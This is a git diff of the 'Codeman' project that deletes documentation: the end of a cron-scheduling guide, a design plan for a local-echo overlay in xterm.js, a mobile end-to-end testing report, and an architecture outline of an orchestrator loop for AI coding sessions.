| `cron:runUpdated` | `CronJobRun` | A run advanced state (`session_started` / `prompt_sent` / `failed`). |
|
||||
|
||||
---
|
||||
|
||||
## 12. State & persistence
|
||||
|
||||
Persisted in `~/.codeman/state.json` via `StateStore`:
|
||||
|
||||
- `AppState.cronJobs` — map of `id → CronJob`.
|
||||
- `AppState.cronJobRuns` — map of `id → CronJobRun`.
|
||||
|
||||
Jobs and their schedules survive restarts; `init()` recomputes `nextRunAt` on
|
||||
boot. Sessions the jobs create persist through the normal session-recovery path.
|
||||
|
||||
---
|
||||
|
||||
## 13. Limits & constants
|
||||
|
||||
| Constant | Value | Source |
|
||||
| ------------------------ | --------------------- | ------------------------------------------------ |
|
||||
| Due-tick interval | 30s | `CRON_TICK_INTERVAL` (`config/server-timing.ts`) |
|
||||
| Readiness poll | 60 × 500ms | `CRON_READY_MAX_ATTEMPTS` |
|
||||
| Readiness settle | 2000ms | `CRON_READY_SETTLE_MS` |
|
||||
| Run-history cap (global) | 500 | `MAX_CRON_RUN_HISTORY` (`config/map-limits.ts`) |
|
||||
| Saved-jobs cap | 100 | `MAX_CRON_JOBS` (`config/map-limits.ts`) |
|
||||
| Concurrent-session cap | 50 | `MAX_CONCURRENT_SESSIONS` |
|
||||
| Prompt-file size cap | 1 MiB | `MAX_PROMPT_FILE_BYTES` (`cron-service.ts`) |
|
||||
| `name` length | 1–200 | `CronJobSchema` |
|
||||
| `promptText` length | ≤ 100000 | `CronJobSchema` |
|
||||
| `intervalMinutes` | 1–525600 | `CronJobSchema` |
|
||||
| `weeklyDays` | 1–7 entries, each 0–6 | `CronJobSchema` |
|
||||
|
||||
---
|
||||
|
||||
## 14. Known limitations
|
||||
|
||||
- **Server-local timezone only** — `daily`/`weekly` times are interpreted in the
|
||||
host's local time; there is no per-job timezone.
|
||||
- **Interval drift** — `interval` re-anchors to the actual fire time; long-running
|
||||
intervals slowly shift.
|
||||
- **Single-line prompts** — multi-line prompts are rejected (schema, form, and
|
||||
at fire time for prompt files); tell the agent to read a file itself for
|
||||
multi-line instructions.
|
||||
- **`runNow` / tick race** — a manual Run Now firing at the same instant as a
|
||||
scheduled tick is theoretically possible; benign (you may get two sessions).
|
||||
- **`{enabled:true}` on a dead `once` job** — re-enabling a fired one-time job
|
||||
without changing its schedule leaves it enabled-but-dead (won't fire); change
|
||||
the schedule to re-arm.
|
||||
|
||||
---
|
||||
|
||||
## 15. Troubleshooting
|
||||
|
||||
| Symptom | Likely cause | Fix |
|
||||
| ------------------------------ | ----------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------- |
|
||||
| Job never fires | Disabled, or `nextRunAt: null` | Check **Enabled**; verify the schedule fields are complete. |
|
||||
| Run shows `failed` immediately | Bad `workingDir`, prompt-file rejected, or session cap hit | Read `errorMessage` on the run; confirm the dir exists and the prompt file is inside it and < 1 MiB. |
|
||||
| Run shows `skipped` | `skip_if_same_agent_running` + another live same-type session (this job's own sessions and dead tabs don't count) | Switch to `warn_only`, or wait for the other session to end. |
|
||||
| Run fails with "single line" | Multi-line prompt text / prompt file | Keep the prompt to one line; point the agent at a file to read for long instructions. |
|
||||
| Sessions pile up between runs | `autoClosePreviousSession: false` | Re-enable auto-close, or delete old tabs before the 50-session cap bites (see §8). |
|
||||
| Wrong fire time | Timezone assumption | Times are **server-local** — check the host clock/TZ. |
|
||||
| One-time job won't re-fire | `completedOnce` set | Edit the schedule (any real schedule change re-arms it). |
|
||||
|
||||
---
|
||||
|
||||
## 16. Related docs
|
||||
|
||||
- `docs/cron-discovery.md` — architecture / integration-point analysis (why the
|
||||
feature reuses the session layer and stays distinct from `ScheduledRun`).
|
||||
- `docs/cron-build-brief.md` — the original build brief / requirements.
|
||||
- `CLAUDE.md` → **Key Patterns → Cron** — the one-paragraph engineering summary.
|
||||
- Tests: `test/cron-time.test.ts` (schedule math), `test/cron-service.test.ts`
|
||||
(CRUD, tick, concurrency, security).
|
||||
|
Before Width: | Height: | Size: 56 KiB |
|
Before Width: | Height: | Size: 859 KiB |
@@ -1,3 +0,0 @@
|
||||
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 60">
|
||||
<text x="160" y="48" font-family="system-ui, -apple-system, 'Segoe UI', Roboto, sans-serif" font-size="52" font-weight="700" fill="#60a5fa" text-anchor="middle">Codeman</text>
|
||||
</svg>
|
||||
|
Before Width: | Height: | Size: 247 B |
|
Before Width: | Height: | Size: 96 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 87 KiB |
|
Before Width: | Height: | Size: 84 KiB |
|
Before Width: | Height: | Size: 195 KiB |
|
Before Width: | Height: | Size: 50 KiB |
|
Before Width: | Height: | Size: 583 KiB |
|
Before Width: | Height: | Size: 4.3 MiB |
|
Before Width: | Height: | Size: 28 MiB |
|
Before Width: | Height: | Size: 226 KiB |
|
Before Width: | Height: | Size: 138 KiB |
|
Before Width: | Height: | Size: 806 KiB |
@@ -1,233 +0,0 @@
|
||||
# Local Echo Overlay — Implementation Plan
|
||||
|
||||
> **Status: SHIPPED.** Implementation lives in `packages/xterm-zerolag-input/src/` (overlay-renderer.ts, prompt-finder.ts, cell-dimensions.ts, zerolag-input-addon.ts) with the embedded copy in `src/web/public/app.js`. This document is retained as historical design context.
|
||||
|
||||
## Context
|
||||
|
||||
User accesses Codeman remotely from Thailand to Switzerland over Tailscale (~200-300ms RTT).
|
||||
Every keystroke is invisible for 200-300ms before the server echoes it back. This makes typing
|
||||
painfully slow on mobile. Previous attempts to write directly to xterm.js buffer failed because
|
||||
Ink (Claude Code's terminal framework) does full-screen redraws that corrupt injected characters.
|
||||
|
||||
## Approach: DOM Overlay (Mosh-inspired)
|
||||
|
||||
A single absolutely-positioned `<span>` inside xterm.js's `.xterm-screen` element that shows
|
||||
typed characters at the cursor position. This completely avoids buffer conflicts with Ink because
|
||||
we never write to xterm.js's buffer — the overlay is a pure DOM element sitting on top.
|
||||
|
||||
**Why this works when buffer writes don't:** Ink owns the terminal buffer and does full-line
|
||||
redraws. A DOM overlay sits in a separate rendering layer (z-index 7) and doesn't interfere
|
||||
with Ink's cursor management or screen redraws at all. When Ink redraws (server output arrives),
|
||||
we simply hide the overlay.
|
||||
|
||||
**Why it will look indistinguishable:** We use the DOM renderer (not canvas/WebGL), so both
|
||||
terminal text and overlay text are rendered by the same browser font engine with identical
|
||||
sub-pixel rendering. (Originally designed against xterm.js v5.3.0; project now on `@xterm/xterm` ^6.0.0 — the internal `_core._renderService.dimensions` access path still works in v6.)
|
||||
|
||||
## Key Technical Details (from research)
|
||||
|
||||
### Pixel Positioning Formula
|
||||
```js
|
||||
// Same formula used by BufferDecorationRenderer, CompositionHelper, Terminal._syncTextArea
|
||||
const dims = terminal._core._renderService.dimensions;
|
||||
const left = cursorX * dims.css.cell.width; // CSS pixels, relative to .xterm-screen
|
||||
const top = cursorY * dims.css.cell.height; // CSS pixels, relative to .xterm-screen
|
||||
```
|
||||
|
||||
- `cursorX` = `terminal.buffer.active.cursorX` (0 to terminal.cols)
|
||||
- `cursorY` = `terminal.buffer.active.cursorY` (0 to terminal.rows-1, ALREADY viewport-relative)
|
||||
- No scroll offset math needed
|
||||
|
||||
### Cell Dimensions (no public API in v5/v6 — use internal; public in v7+)
|
||||
```js
|
||||
const dims = terminal._core._renderService.dimensions;
|
||||
dims.css.cell.width // e.g., 8.4px
|
||||
dims.css.cell.height // e.g., 17px
|
||||
```
|
||||
Public `terminal.dimensions` only available in v7.0.0+.
|
||||
|
||||
### xterm.js DOM Structure
|
||||
```
|
||||
div.terminal.xterm
|
||||
├── div.xterm-viewport (overflow-y: scroll)
|
||||
└── div.xterm-screen (position: relative) ← INSERT OVERLAY HERE
|
||||
├── div.xterm-helpers (z-index: 5)
|
||||
├── div.xterm-rows (the actual text) (z-index: auto/0)
|
||||
├── div.xterm-selection (z-index: 1)
|
||||
└── div.xterm-decoration-container (z-index: 6-7)
|
||||
```
|
||||
|
||||
### Z-Index Layers
|
||||
| Layer | Z-Index |
|
||||
|-------|---------|
|
||||
| textarea | -5 |
|
||||
| row content (DOM renderer) | auto (0) |
|
||||
| selection | 1 |
|
||||
| composition (IME) | 1 |
|
||||
| helpers | 5 |
|
||||
| decorations | 6 |
|
||||
| decorations (top layer) | 7 ← OUR OVERLAY |
|
||||
| overview ruler | 8 |
|
||||
| accessibility | 10 |
|
||||
|
||||
### Font Matching CSS
|
||||
```css
|
||||
.local-echo-overlay {
|
||||
position: absolute;
|
||||
z-index: 7;
|
||||
pointer-events: none;
|
||||
white-space: pre;
|
||||
font-kerning: none;
|
||||
overflow: hidden;
|
||||
display: none;
|
||||
/* Set dynamically: left, top, height, line-height, font-family, font-size, color, letter-spacing */
|
||||
}
|
||||
```
|
||||
|
||||
Critical: match `letter-spacing` from `.xterm-rows` container (DPR rounding compensation).
|
||||
|
||||
### Font Properties from Terminal
|
||||
```js
|
||||
terminal.options.fontFamily // '"Fira Code", "Cascadia Code", ...'
|
||||
terminal.options.fontSize // 14 (10 on mobile)
|
||||
terminal.options.fontWeight // 'normal'
|
||||
terminal.options.letterSpacing // 0
|
||||
terminal.options.lineHeight // 1.2
|
||||
```
|
||||
|
||||
Use actual `dims.css.cell.height` for line-height (not the multiplier).
|
||||
|
||||
## Files to Modify
|
||||
|
||||
### `src/web/public/app.js` — All logic
|
||||
|
||||
1. **Constructor** (~line 1455): Initialize overlay state variables
|
||||
2. **After terminal creation** (in `setupTerminal` or similar): Create overlay DOM element
|
||||
3. **`terminal.onData` handler** (~line 1801): Echo printable chars to overlay when idle
|
||||
4. **`flushPendingWrites`** (~line 2083): Hide overlay when server output arrives
|
||||
5. **SSE event handlers**: Update overlay state on session:idle/working/exit
|
||||
6. **`selectSession`**: Clear overlay on tab switch
|
||||
7. **`handleInit`**: Clear overlay on SSE reconnect
|
||||
8. **Settings load/save** (`openAppSettings`/`saveAppSettings`): Toggle checkbox
|
||||
|
||||
### `src/web/public/index.html` — Settings toggle
|
||||
|
||||
After Image Watcher section (~line 878), add "Input" section with checkbox.
|
||||
|
||||
## Implementation Details
|
||||
|
||||
### Overlay Class (inline in app.js, near extractSyncSegments)
|
||||
|
||||
```js
|
||||
class LocalEchoOverlay {
|
||||
constructor(terminal) {
|
||||
this.terminal = terminal;
|
||||
this.overlay = document.createElement('span');
|
||||
// ... CSS setup ...
|
||||
const screen = terminal.element.querySelector('.xterm-screen');
|
||||
screen.appendChild(this.overlay);
|
||||
this.pendingText = '';
|
||||
this.timeout = null;
|
||||
}
|
||||
|
||||
addChar(char) {
|
||||
this.pendingText += char;
|
||||
this._render();
|
||||
this._resetTimeout();
|
||||
}
|
||||
|
||||
removeChar() {
|
||||
if (this.pendingText.length > 0) {
|
||||
this.pendingText = this.pendingText.slice(0, -1);
|
||||
this._render();
|
||||
if (this.pendingText.length > 0) this._resetTimeout();
|
||||
else this._clearTimeout();
|
||||
}
|
||||
}
|
||||
|
||||
clear() {
|
||||
this.pendingText = '';
|
||||
this.overlay.textContent = '';
|
||||
this.overlay.style.display = 'none';
|
||||
this._clearTimeout();
|
||||
}
|
||||
|
||||
_render() {
|
||||
if (!this.pendingText) { this.clear(); return; }
|
||||
const dims = this.terminal._core._renderService.dimensions;
|
||||
const cellW = dims.css.cell.width;
|
||||
const cellH = dims.css.cell.height;
|
||||
const cursorX = this.terminal.buffer.active.cursorX;
|
||||
const cursorY = this.terminal.buffer.active.cursorY;
|
||||
|
||||
this.overlay.style.left = (cursorX * cellW) + 'px';
|
||||
this.overlay.style.top = (cursorY * cellH) + 'px';
|
||||
this.overlay.style.height = cellH + 'px';
|
||||
this.overlay.style.lineHeight = cellH + 'px';
|
||||
this.overlay.textContent = this.pendingText;
|
||||
this.overlay.style.display = '';
|
||||
}
|
||||
|
||||
_resetTimeout() {
|
||||
this._clearTimeout();
|
||||
this.timeout = setTimeout(() => this.clear(), 2000);
|
||||
}
|
||||
|
||||
_clearTimeout() {
|
||||
if (this.timeout) { clearTimeout(this.timeout); this.timeout = null; }
|
||||
}
|
||||
|
||||
get hasPending() { return this.pendingText.length > 0; }
|
||||
|
||||
dispose() {
|
||||
this.clear();
|
||||
this.overlay.remove();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Integration Points
|
||||
|
||||
**Input handler (`terminal.onData`):**
|
||||
- Backspace (`\x7f`): if overlay has pending + echo enabled → `overlay.removeChar()`
|
||||
- Enter (`\r`/`\n`): `overlay.clear()`, disable echo (session goes busy)
|
||||
- Other control chars / multi-char (paste): `overlay.clear()`
|
||||
- Single printable char (charCode >= 32, length === 1): if echo enabled → `overlay.addChar(data)`
|
||||
|
||||
**Output handler (`flushPendingWrites`):**
|
||||
- After writing segments: if overlay has pending text → `overlay.clear()` (server confirmed)
|
||||
|
||||
**State management:**
|
||||
- `_localEchoEnabled` boolean, updated on session status change + settings change
|
||||
- Only enabled when: setting on + active session is idle
|
||||
- On idle→busy transition: clear overlay
|
||||
- On tab switch: clear overlay
|
||||
- On SSE reconnect: clear overlay
|
||||
|
||||
### Settings
|
||||
|
||||
**index.html:** Checkbox `appSettingsLocalEcho` under "Input" section header
|
||||
**openAppSettings:** Load `settings.localEchoEnabled ?? false`
|
||||
**saveAppSettings:** Save checkbox + call `_updateLocalEchoState()`
|
||||
Default: **disabled** (opt-in)
|
||||
|
||||
## Edge Cases
|
||||
|
||||
| Case | Handling |
|
||||
|---|---|
|
||||
| Paste (multi-char onData) | data.length > 1 → NOT echoed. Server echoes it. |
|
||||
| Misprediction | Server output arrives → overlay cleared → server redraws correctly |
|
||||
| Idle→busy race | _updateLocalEchoState() disables + clears overlay |
|
||||
| Server unresponsive | 2s timeout → overlay cleared |
|
||||
| Tab switch | selectSession() clears overlay |
|
||||
| SSE reconnect | handleInit() clears overlay |
|
||||
| Terminal resize | Overlay position recalculated on next _render() |
|
||||
| Scrolled back | cursorY is viewport-relative, position stays correct |
|
||||
| Unicode/emoji | data.length > 1 → not echoed (ASCII-only) |
|
||||
|
||||
## What NOT to Do
|
||||
|
||||
- Do NOT write to `terminal.write()` — Ink conflicts
|
||||
- Do NOT use `registerDecoration` — requires markers, can't follow cursor smoothly
|
||||
- Do NOT try to match predictions against server output — Ink's full-line redraws make this impossible
|
||||
- Do NOT use `stripAnsiForMatch` / `findEscapeEnd` — removed, not needed for overlay approach
|
||||
@@ -1,228 +0,0 @@
|
||||
# Mobile E2E Testing Report
|
||||
|
||||
**Date**: 2026-01-31
|
||||
**Status**: All 32 tests passing
|
||||
|
||||
## Overview
|
||||
|
||||
Comprehensive mobile E2E testing was performed using Playwright with Chromium in mobile emulation mode. Tests validate touch interactions, responsive design, mobile-specific UI behaviors, and edge cases across various device viewports.
|
||||
|
||||
## Test Coverage Summary
|
||||
|
||||
| Test File | Tests | Description |
|
||||
|-----------|-------|-------------|
|
||||
| `mobile-safari.e2e.ts` | 6 | Core mobile Safari/iPhone tests |
|
||||
| `mobile-comprehensive.e2e.ts` | 13 | UI components, modals, interactions |
|
||||
| `mobile-edge-cases.e2e.ts` | 13 | Edge cases: orientation, narrow screens, safe areas |
|
||||
|
||||
## Bugs Found and Fixed
|
||||
|
||||
### 1. Monitor Panel Overlapping Toolbar on Mobile
|
||||
|
||||
**File**: `src/web/public/styles.css` (lines 7969-7982)
|
||||
|
||||
**Problem**: The monitor panel was positioned at `bottom: var(--toolbar-height)` (40px), but the mobile toolbar has `height: auto` with `flex-wrap: wrap`, causing it to be taller than 40px. This resulted in the monitor panel header intercepting tap events on the "Run Claude" button.
|
||||
|
||||
**Error message**:
|
||||
```
|
||||
<div class="monitor-panel-title">Monitor</div> from <div id="monitorPanel" class="monitor-panel">…</div> subtree intercepts pointer events
|
||||
```
|
||||
|
||||
**Fix**: Hide monitor and subagents panels on phones by default:
|
||||
```css
|
||||
@media (max-width: 430px) {
|
||||
.monitor-panel,
|
||||
.subagents-panel {
|
||||
display: none !important;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Rationale**: On phone screens (<430px), there isn't enough space for these panels anyway. Users can still access session info via the header and session options modal.
|
||||
|
||||
---
|
||||
|
||||
### 2. WebKit Browser Missing System Dependencies
|
||||
|
||||
**File**: `test/e2e/fixtures/mobile-browser.fixture.ts`
|
||||
|
||||
**Problem**: WebKit requires system libraries (libgtk-4, libgstreamer, etc.) that may not be installed on all systems, causing mobile tests to fail.
|
||||
|
||||
**Fix**: Added fallback to Chromium with mobile emulation:
|
||||
```typescript
|
||||
try {
|
||||
browser = await webkit.launch({ headless: true });
|
||||
userAgent = 'Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X)...';
|
||||
} catch {
|
||||
// WebKit failed, use Chromium with mobile emulation
|
||||
browser = await chromium.launch({ headless: true, args: [...] });
|
||||
userAgent = 'Mozilla/5.0 (Linux; Android 14; Pixel 8)...';
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### 3. Race Condition in Session Tab Detection
|
||||
|
||||
**File**: `test/e2e/workflows/mobile-safari.e2e.ts`
|
||||
|
||||
**Problem**: Test waited for `.session-tab` selector but then checked `.session-tab.active`, causing timing issues where the tab existed but wasn't yet marked as active.
|
||||
|
||||
**Fix**: Wait for the active tab directly:
|
||||
```typescript
|
||||
// Before (race condition)
|
||||
await page.waitForSelector('.session-tab', { timeout: ... });
|
||||
const tabVisible = await page.isVisible('.session-tab.active');
|
||||
|
||||
// After (correct)
|
||||
await page.waitForSelector('.session-tab.active', { timeout: ... });
|
||||
const tabVisible = await page.isVisible('.session-tab.active');
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Known Limitations
|
||||
|
||||
### No Kill All Button on Mobile
|
||||
|
||||
**Status**: By design (not a bug)
|
||||
|
||||
The "Kill All" button is located in the Monitor panel, which is hidden on mobile devices (<430px). Users can close sessions individually via the close button on each session tab.
|
||||
|
||||
**Consideration for future**: Could add a "Kill All" option in the app settings modal or a long-press context menu on session tabs.
|
||||
|
||||
### No Help Button on Mobile
|
||||
|
||||
**Status**: By design
|
||||
|
||||
There is no dedicated help button in the mobile UI. Help is accessible via:
|
||||
- Keyboard shortcut (`?` key)
|
||||
- App settings modal
|
||||
|
||||
---
|
||||
|
||||
## Test Coverage
|
||||
|
||||
### mobile-safari.e2e.ts (Port 3191)
|
||||
|
||||
| Test | Description |
|
||||
|------|-------------|
|
||||
| Touch-friendly UI rendering | Verifies `touch-device` and `device-mobile` body classes |
|
||||
| 44px minimum touch targets | Ensures buttons meet WCAG AA touch target requirements |
|
||||
| Tap gestures for session creation | Creates session via tap on Run Claude button |
|
||||
| Always-visible close buttons | Verifies opacity:1 on touch devices (no hover dependency) |
|
||||
| Header hiding on small screens | Brand, stats, font controls hidden on phones |
|
||||
| Tablet viewport rendering | iPad Pro 11" (834x1194) renders with `device-desktop` + `touch-device` |
|
||||
|
||||
### mobile-comprehensive.e2e.ts (Port 3192)
|
||||
|
||||
| Test | Description |
|
||||
|------|-------------|
|
||||
| Welcome overlay buttons | Touch-friendly welcome overlay with 44px+ button height |
|
||||
| Run Claude button prominence | Button visible with `flex: 1` on mobile |
|
||||
| Case dropdown visibility | Dropdown accessible and functional |
|
||||
| Version display hiding | `.toolbar-center` hidden on phones |
|
||||
| Horizontal tab scrolling | Session tabs allow `overflow-x: auto` scrolling |
|
||||
| Tab switching on tap | Tapping tabs switches active session |
|
||||
| Full-screen modals | Modals use 100% width/height on phones |
|
||||
| Create case modal | Case creation modal accessible via + button |
|
||||
| Notification button | Notification bell visible and tappable |
|
||||
| Settings button | Settings gear has adequate touch target |
|
||||
| Close confirmation modal | Close button triggers confirmation dialog |
|
||||
| Token count display | Token counter visible in header |
|
||||
| Ralph wizard full-screen | Wizard modal renders full-screen |
|
||||
|
||||
### mobile-edge-cases.e2e.ts (Port 3193)
|
||||
|
||||
| Test | Description |
|
||||
|------|-------------|
|
||||
| Landscape orientation handling | 874x402 landscape mode with proper classes |
|
||||
| Terminal in landscape | Terminal renders with adequate height |
|
||||
| Very narrow viewport (280px) | Galaxy Fold folded state usable |
|
||||
| Narrow screen toolbar | Toolbar doesn't overflow on 280px |
|
||||
| Session options via gear icon | Gear icon visible, modal opens on tap |
|
||||
| Modal tab switching | Session options modal tabs work on touch |
|
||||
| Terminal tap interactions | Terminal responds to touch events |
|
||||
| Primary touch targets | Main buttons meet 44px height requirement |
|
||||
| iOS safe area CSS variables | `--safe-area-*` variables defined |
|
||||
| Double-tap zoom prevention | touch-action styles applied |
|
||||
| Modal body scrolling | `overflow-y: auto` for touch scrolling |
|
||||
| Viewport meta tag | Proper mobile viewport configuration |
|
||||
| Android Pixel viewport | 412x915 Pixel 7a renders correctly |
|
||||
|
||||
---
|
||||
|
||||
## Mobile CSS Breakpoints
|
||||
|
||||
| Breakpoint | Class | Description |
|
||||
|------------|-------|-------------|
|
||||
| < 430px | `device-mobile` | Phone - most features hidden/simplified |
|
||||
| 430-768px | `device-tablet` | Tablet - intermediate layout |
|
||||
| > 768px | `device-desktop` | Desktop - full features |
|
||||
|
||||
Touch devices also get `touch-device` class regardless of screen size.
|
||||
|
||||
---
|
||||
|
||||
## Viewports Tested
|
||||
|
||||
| Device | Width | Height | Scale | Notes |
|
||||
|--------|-------|--------|-------|-------|
|
||||
| iPhone 17 Pro | 402 | 874 | 3x | Primary phone test |
|
||||
| iPhone 17 Pro Landscape | 874 | 402 | 3x | Orientation testing |
|
||||
| iPhone 17 Pro Max | 440 | 956 | 3x | Larger phone |
|
||||
| iPad Pro 11" | 834 | 1194 | 2x | Tablet testing |
|
||||
| Galaxy Fold (folded) | 280 | 653 | 3x | Extreme narrow test |
|
||||
| Pixel 7a | 412 | 915 | 2.625x | Android testing |
|
||||
|
||||
---
|
||||
|
||||
## Running Mobile Tests
|
||||
|
||||
```bash
|
||||
# Install Playwright browsers (Chromium is required, WebKit optional)
|
||||
npx playwright install chromium
|
||||
|
||||
# Run individual test files
|
||||
npx vitest run test/e2e/workflows/mobile-safari.e2e.ts
|
||||
npx vitest run test/e2e/workflows/mobile-comprehensive.e2e.ts
|
||||
npx vitest run test/e2e/workflows/mobile-edge-cases.e2e.ts
|
||||
|
||||
# Run all mobile tests together
|
||||
npx vitest run test/e2e/workflows/mobile-safari.e2e.ts test/e2e/workflows/mobile-comprehensive.e2e.ts test/e2e/workflows/mobile-edge-cases.e2e.ts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Port Allocations
|
||||
|
||||
| Port | Test File |
|
||||
|------|-----------|
|
||||
| 3191 | mobile-safari.e2e.ts |
|
||||
| 3192 | mobile-comprehensive.e2e.ts |
|
||||
| 3193 | mobile-edge-cases.e2e.ts |
|
||||
|
||||
---
|
||||
|
||||
## Key Mobile UI Behaviors
|
||||
|
||||
1. **Monitor/Subagents panels**: Hidden on phones (<430px)
|
||||
2. **Toolbar**: Wraps content with `flex-wrap: wrap`, variable height
|
||||
3. **Session tabs**: Horizontal scroll with hidden scrollbar
|
||||
4. **Modals**: Full-screen on phones (100% width/height)
|
||||
5. **Touch targets**: Minimum 44px height for WCAG compliance
|
||||
6. **Close buttons**: Always visible (opacity: 1) on touch devices
|
||||
7. **Header**: Brand, stats, font controls hidden on phones
|
||||
8. **Safe areas**: CSS variables for iOS notch handling
|
||||
|
||||
---
|
||||
|
||||
## Future Improvements
|
||||
|
||||
1. Add swipe gesture tests for tab navigation
|
||||
2. Add virtual keyboard handling tests (show/hide behavior)
|
||||
3. Add orientation change tests (dynamic portrait/landscape switching)
|
||||
4. Add safe area inset tests for iOS notch handling with actual device values
|
||||
5. Consider showing a condensed monitor indicator on mobile
|
||||
6. Add "Kill All" option accessible from mobile UI
|
||||
7. Test pull-to-refresh prevention on iOS Safari
|
||||
@@ -1,367 +0,0 @@
|
||||
# Orchestrator Loop — Architecture & Data Flow
|
||||
|
||||
> Technical architecture document. Not for GitHub.
|
||||
|
||||
## System Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────────┐
|
||||
│ CODEMAN WEB UI │
|
||||
│ ┌──────────────────────────────────────────────────────────────┐ │
|
||||
│ │ Orchestrator Dashboard │ │
|
||||
│ │ [Goal Input] [Plan View] [Phase Progress] [Agent Activity] │ │
|
||||
│ └───────────────────────────┬──────────────────────────────────┘ │
|
||||
│ │ SSE Events │
|
||||
│ ▼ │
|
||||
│ ┌──────────────────────────────────────────────────────────────┐ │
|
||||
│ │ Orchestrator API Routes (/api/orchestrator/*) │ │
|
||||
│ └───────────────────────────┬──────────────────────────────────┘ │
|
||||
└───────────────────────────────┼─────────────────────────────────────┘
|
||||
▼
|
||||
┌─────────────────────────────────────────────────────────────────────┐
|
||||
│ ORCHESTRATOR LOOP │
|
||||
│ │
|
||||
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────────────┐ │
|
||||
│ │ Orchestrator │ │ Orchestrator │ │ Orchestrator │ │
|
||||
│ │ Planner │ │ Loop (state │ │ Verifier │ │
|
||||
│ │ │ │ machine) │ │ │ │
|
||||
│ │ • Research │◄──►│ • Phase mgmt │◄──►│ • Test runner │ │
|
||||
│ │ • Plan gen │ │ • Task queue │ │ • AI review │ │
|
||||
│ │ • Phasing │ │ • Event loop │ │ • Output checks │ │
|
||||
│ └──────┬───────┘ └──────┬───────┘ └──────────┬───────────┘ │
|
||||
│ │ │ │ │
|
||||
│ ▼ ▼ ▼ │
|
||||
│ ┌──────────────────────────────────────────────────────────────┐ │
|
||||
│ │ EXISTING CODEMAN INFRASTRUCTURE │ │
|
||||
│ │ │ │
|
||||
│ │ SessionManager ←→ Sessions ←→ PTY (Claude CLI) │ │
|
||||
│ │ ↑ ↑ ↑ │ │
|
||||
│ │ │ │ │ │ │
|
||||
│ │ TaskQueue RalphTracker RespawnController │ │
|
||||
│ │ StateStore HooksConfig TeamWatcher │ │
|
||||
│ │ Auto-Ops SubagentWatcher SSE Broadcast │ │
|
||||
│ └──────────────────────────────────────────────────────────────┘ │
|
||||
└─────────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Data Flow: Complete Lifecycle
|
||||
|
||||
### 1. User Submits Goal
|
||||
|
||||
```
|
||||
User → POST /api/orchestrator/start { goal: "Build a REST API...", config: {...} }
|
||||
→ OrchestratorLoop.start(goal)
|
||||
→ state = PLANNING
|
||||
→ emit('stateChanged', 'planning')
|
||||
→ SSE: orchestrator:stateChanged
|
||||
```
|
||||
|
||||
### 2. Planning Phase
|
||||
|
||||
```
|
||||
OrchestratorPlanner.generatePlan(goal)
|
||||
→ PlanOrchestrator.generateDetailedPlan(goal)
|
||||
→ [Research Agent] → enriched task description
|
||||
→ [Planner Agent] → PlanItem[]
|
||||
→ groupIntoPhases(planItems)
|
||||
→ topological sort by dependencies
|
||||
→ group into layers
|
||||
→ assign team strategies
|
||||
→ OrchestratorPlan { phases: [...] }
|
||||
→ state = APPROVAL
|
||||
→ emit('planReady', plan)
|
||||
→ SSE: orchestrator:planReady
|
||||
```
|
||||
|
||||
### 3. User Approves Plan
|
||||
|
||||
```
|
||||
User → POST /api/orchestrator/approve
|
||||
→ OrchestratorLoop.approvePlan()
|
||||
→ state = EXECUTING
|
||||
→ executePhase(phases[0])
|
||||
```
|
||||
|
||||
### 4. Phase Execution
|
||||
|
||||
```
|
||||
executePhase(phase)
|
||||
→ For each task in phase:
|
||||
→ Convert to CreateTaskOptions
|
||||
→ Add to TaskQueue with completion phrase "PHASE_{N}_TASK_{M}_DONE"
|
||||
→ If phase.teamStrategy.type === 'team':
|
||||
→ Start session with AGENT_TEAMS enabled
|
||||
→ Send team orchestration prompt to lead
|
||||
→ Else:
|
||||
→ Assign tasks to available sessions (same as RalphLoop)
|
||||
|
||||
→ Listen for task completion events:
|
||||
→ TaskQueue emits taskCompleted
|
||||
→ Check: all phase tasks done?
|
||||
→ Yes → state = VERIFYING → verifyPhase(phase)
|
||||
→ No → wait for more completions
|
||||
```
|
||||
|
||||
### 5. Verification
|
||||
|
||||
```
|
||||
verifyPhase(phase)
|
||||
→ OrchestratorVerifier.verify(phase, session)
|
||||
→ Run test commands via session
|
||||
→ Check file existence
|
||||
→ AI review (optional)
|
||||
→ If passed:
|
||||
→ phase.status = 'passed'
|
||||
→ emit('phaseCompleted', phase)
|
||||
→ If more phases: executePhase(nextPhase)
|
||||
→ If last phase: state = COMPLETED
|
||||
→ If failed:
|
||||
→ phase.attempts++
|
||||
→ If attempts < maxAttempts:
|
||||
→ state = REPLANNING
|
||||
→ Generate recovery tasks
|
||||
→ state = EXECUTING (retry)
|
||||
→ Else:
|
||||
→ state = FAILED
|
||||
→ emit('phaseFailed', phase, reason)
|
||||
```
|
||||
|
||||
### 6. Context Management Between Phases
|
||||
|
||||
```
|
||||
After phase completion:
|
||||
→ If config.compactBetweenPhases:
|
||||
→ session.sendInput('/compact')
|
||||
→ Wait for compact to complete
|
||||
→ If config.respawnBetweenMilestones && phase is a milestone:
|
||||
→ Save orchestrator state to StateStore
|
||||
→ Respawn session (kill + recreate)
|
||||
→ Send resume prompt with phase context
|
||||
```
|
||||
|
||||
## File Layout
|
||||
|
||||
```
|
||||
src/
|
||||
├── orchestrator-loop.ts # Main state machine (~400 lines)
|
||||
├── orchestrator-planner.ts # Plan generation + phase grouping (~300 lines)
|
||||
├── orchestrator-verifier.ts # Phase verification (~200 lines)
|
||||
├── types/
|
||||
│ └── orchestrator.ts # All orchestrator types (~150 lines)
|
||||
├── prompts/
|
||||
│ └── orchestrator.ts # Prompt templates (~200 lines)
|
||||
├── web/
|
||||
│ ├── routes/
|
||||
│ │ └── orchestrator-routes.ts # API endpoints (~250 lines)
|
||||
│ └── public/
|
||||
│ └── orchestrator-ui.js # Frontend panel (~500 lines)
|
||||
```
|
||||
|
||||
## Integration Points with Existing Code
|
||||
|
